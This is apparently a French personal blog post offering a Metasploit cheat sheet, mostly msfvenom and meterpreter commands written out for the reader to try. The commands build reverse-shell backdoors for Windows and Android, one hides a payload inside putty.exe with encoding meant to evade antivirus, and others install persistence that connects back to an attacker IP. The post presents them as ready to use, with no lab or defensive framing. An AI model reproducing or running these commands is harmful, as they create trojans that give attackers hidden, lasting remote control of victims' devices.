Cheatsheet Metasploit

Je sais que les films & séries que je regardes on tendance à beaucoup m’influencer dans ma vie. Le cinéma transmet ses idées via ses histoires et nous nous les approprions le temps d’une scéance, le temps de mélé notre réel de l’irréel.
Ces derniers temps j’ai repris la série Mr.Robot, en voilà une qui parle aux vraies geeks barbues & marginaux du Command Line Tool que nous sommes. Cela fait maintenant plusieurs années que je me fais des séssions de “hack par intermitence”, je test diférents exploits pour m’amuser & améliorer ma technique. Comme de simple challenge, à chaque fois j’ai le souhait de repousser mes limites et d’en apprendre plus. Cela est long & laborieux mais je pense avoir une petite base de connaissance sur le framework Metasploit pour vous fournir quelques exemples d’utilisations interéssant à mettre en pratique.

Create Backdoor (MsfVenom)

Windows Backdoor

1
msfvenom -p "windows/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -f "exe" -o "backdoor.exe"
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -f File Format
  • -o Output

VNC Inject

1
msfvenom -p "windows/vncinject/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -f "exe" -o "gui.exe"

Hide Backdoor

1
msfvenom -p "windows/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -x "putty.exe" -k -e "x86/shikata_ga_nai" -i 3 -b "\x00" -f "exe" -o "puttyX.exe"
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -x Old executable
  • -e Encrypted
  • -f File Format
  • -o Output

Android Backdoor

1
msfvenom -p "android/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" AndroidHideAppIcon="true" AndroidMeterpreterDebug="true" AndroidWakelock="true" -o "backdoor.apk"
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -o Output

Persistence Backddor

Pour finir en beauté, lors de l’ouverture d’une session avec l’un de vos payload, vous voudriez peut-être faire en sorte que votre backdoor “persiste” dans le temps sur la machine infecté. Pour cela rien de bien compliqué, une commande existe déjà sur Metasploit.

1
meterpreter> run persistence -U i 5 -p "8080" -r "192.168.1.12"
1
meterpreter> run persistence –A –L "c:\\" -X 5 –p "8080" -r "192.168.1.12"